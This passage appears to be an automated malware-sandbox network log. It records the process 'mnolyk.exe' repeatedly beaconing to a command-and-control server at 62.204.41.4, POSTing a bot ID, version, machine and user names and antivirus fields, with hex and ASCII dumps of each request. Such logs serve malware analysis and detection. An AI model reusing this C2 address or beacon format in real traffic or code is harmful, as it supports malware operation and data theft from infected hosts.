Feb 7, 2023 19:57:06.319925070 CET	103	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:06.383476019 CET	103	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.5	49776	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:23.344979048 CET	261	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:23.410629988 CET	261	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
700	192.168.2.5	50413	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:19.937794924 CET	945	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:20.002024889 CET	945	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
701	192.168.2.5	50414	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:20.800585985 CET	946	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:20.865380049 CET	946	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
702	192.168.2.5	50415	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:21.209012032 CET	947	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:21.273582935 CET	947	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
703	192.168.2.5	50416	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:22.006473064 CET	948	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:22.072938919 CET	948	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
704	192.168.2.5	50417	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:22.516623974 CET	949	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:22.578718901 CET	949	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
705	192.168.2.5	50418	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:22.859106064 CET	950	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:22.922579050 CET	950	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
706	192.168.2.5	50419	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:23.118933916 CET	951	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:23.184972048 CET	951	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
707	192.168.2.5	50420	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:23.363085032 CET	952	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:23.426568031 CET	952	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
708	192.168.2.5	50421	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:23.597297907 CET	953	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:23.660217047 CET	953	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
709	192.168.2.5	50422	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:23.830240965 CET	954	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:23.892877102 CET	954	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.5	49777	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:23.720957041 CET	262	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:23.788146973 CET	262	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
710	192.168.2.5	50423	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:24.067699909 CET	955	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:24.133294106 CET	955	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
711	192.168.2.5	50424	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:24.325922012 CET	956	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:24.387582064 CET	956	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
712	192.168.2.5	50425	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:24.567398071 CET	957	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:24.631149054 CET	957	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
713	192.168.2.5	50426	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:24.801296949 CET	958	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:24.865047932 CET	958	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
714	192.168.2.5	50427	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:25.032850027 CET	959	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:25.098226070 CET	959	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
715	192.168.2.5	50428	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:25.267782927 CET	960	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:25.331684113 CET	960	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
716	192.168.2.5	50429	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:25.500721931 CET	961	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:25.563906908 CET	961	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
717	192.168.2.5	50430	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:25.739837885 CET	962	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:25.804398060 CET	962	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
718	192.168.2.5	50431	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:25.972242117 CET	963	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:26.037997961 CET	963	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
